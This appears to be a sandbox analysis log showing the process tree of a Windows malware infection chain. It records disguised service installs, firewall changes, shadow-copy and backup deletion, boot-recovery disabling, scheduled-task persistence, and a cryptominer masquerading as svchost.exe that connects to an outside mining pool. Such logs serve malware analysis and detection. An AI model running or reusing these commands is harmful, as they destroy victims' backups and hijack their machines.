                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:2
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:8432
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=3344 /prefetch:8
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:248
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=3600 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:8348
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=1980 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4540
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1848,6857461914894145354,15149966646604725351,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5304_928486898" --mojo-platform-channel-handle=1480 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1044
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_9DBD.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:8788
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:6080
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:6192
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 624
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                              PID:7740
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EAFA.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EAFA.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                          PID:8492
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EFEC.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EFEC.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:8724
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\942.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\942.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                            PID:5800
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\33BE.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\33BE.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:4852
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\adjpgrzw\
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:9968
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\gyddkcwa.exe" C:\Windows\SysWOW64\adjpgrzw\
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:9596
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" create adjpgrzw binPath= "C:\Windows\SysWOW64\adjpgrzw\gyddkcwa.exe /d\"C:\Users\Admin\AppData\Local\Temp\33BE.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:9724
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" description adjpgrzw "wifi internet conection"
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:10216
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start adjpgrzw
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:9848
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                            PID:9508
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\609B.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\609B.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:9048
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8470.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8470.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:2824
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BD82.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BD82.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:5744
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D224.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D224.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:9112
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -start
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:7236
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 0
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:9592
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:7256
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:4544
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                PID:8408
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:9884
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                                                                                                                                                  PID:6252
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:2736
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:4392
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:10204
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                          wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:5608
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:8264
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                                                                                                          notepad.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:9932
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:5156
                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:4356
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:4300
                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:8824
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:9304
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:9380
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:9516
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:9636
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:9812
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\adjpgrzw\gyddkcwa.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\adjpgrzw\gyddkcwa.exe /d"C:\Users\Admin\AppData\Local\Temp\33BE.exe"
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                              PID:7652
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                svchost.exe
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5524
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6572
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                  PID:6124
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                    PID:9940
                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7812
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                        DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{21aa07f0-afec-7341-8cab-a901a0d28106}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8208
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                                                                          DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                            PID:9512
                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6032
                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8644
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                PID:9416
                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5256
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:8936
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1184
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:9048
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8892
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:10160
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:8408
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5668
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:6896
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:9688
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:9204
                                                                                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DC6.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\DC6.exe
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4320
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CA80.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\CA80.exe
                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:8336
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:9332
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:3544
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:6300
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                          PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:9576
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:388
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4088
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
